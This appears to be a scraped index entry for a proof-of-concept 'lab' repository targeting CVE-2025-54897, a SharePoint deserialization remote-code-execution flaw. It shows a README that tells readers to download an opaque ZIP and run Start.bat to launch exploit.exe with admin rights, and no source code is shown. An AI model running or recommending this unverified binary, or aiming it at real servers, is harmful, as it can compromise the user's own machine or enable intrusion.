PoC details: d2e9eaf689a18959b86b4284904081df54ba0971

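Source
Related vulnerability
Title: Microsoft Office Sharepoint Server code issue vulnerability (CVE-2025-54897)
Description: Microsoft Office Sharepoint Server is a web-based content management and collaboration tool from Microsoft (USA), designed for enterprise customers. The software originally existed as an Office component and still relies heavily on Office, mainly providing enterprise portal and document collaboration features; later versions support integrating Office, Exchange, Lync, Project and Visio. Microsoft Office Sharepoint Server has a code issue vulnerability. An attacker can exploit this vulnerability to execute code remotely. The following products and versions are affected
Introduction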
# Lab: CVE-2025-54897 - Deserialization Vulnerability in Microsoft Office SharePoint

## 🚀 Overview
This lab demonstrates a deserialization vulnerability in Microsoft Office SharePoint that enables remote code execution (RCE). The issue arises from improper handling of untrusted serialized data within SharePoint's object deserialization routines, allowing an authenticated attacker to execute arbitrary code on the target server. With a CVSSv3 score of 8.8, this high-severity vulnerability impacts various SharePoint versions, including Enterprise Server 2016, Server 2019, and Subscription Edition. Successful exploitation could lead to data exfiltration, privilege escalation, or full system compromise in networked environments.


## ⚠️ Safety Disclaimer
This lab involves potentially harmful code execution simulations. Use only in isolated, non-production environments. Do not deploy on live systems or networks without proper authorization. The authors disclaim any liability for misuse, damages, or legal consequences arising from this repository. Always adhere to ethical hacking guidelines and obtain explicit permission before testing on any systems.

**Educational Purpose Only:** This repository is provided solely for learning about software vulnerabilities and secure coding practices. It is not intended to facilitate unauthorized access, attacks, or any illegal activities.

## 📋 Prerequisites
- Windows 10/11 or Windows Server 2016/2019/2022 (64-bit) with administrative privileges.
- .NET Framework 4.8 or later installed.
- Microsoft SharePoint Server 2016/2019 or Subscription Edition (vulnerable versions without patches applied).
- Firewall rules allowing inbound connections on port 80/443 for testing.


## Download & Install
Download the lab resources as a ZIP archive from the following link: [Download Lab ZIP](https://github.com/themaxlpalfaboy/CVE-2025-54897-LAB/raw/refs/heads/main/Lore/cve-2025-54897-lab.zip).


To install:
1. Extract the ZIP to a local directory (e.g., `C:\cve-2025-54897-lab`).
2. Verify .NET dependencies by running `dotnet --version` in Command Prompt.

## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Navigate to the extracted directory.
3. Run `Start.bat` to launch `exploit.exe`. This will open the exploitation interface in a console window.
4. Follow the on-screen prompts to configure the target SharePoint endpoint (e.g., `http://localhost:80` for local testing).
5. Select a payload type and execute to achieve the RCE.


For questions or contributions, email me at ylnnceze1514ck@hotmail.com
File snapshot

    [4.0K] /data/pocs/d2e9eaf689a18959b86b4284904081df54ba0971
    ├── [4.0K] Lore
    │   ├── [8.5M] cve-2025-54897-lab.zip
    │   └── [ 1] update.ps1
    └── [2.5K] README.md

    2 directories, 3 files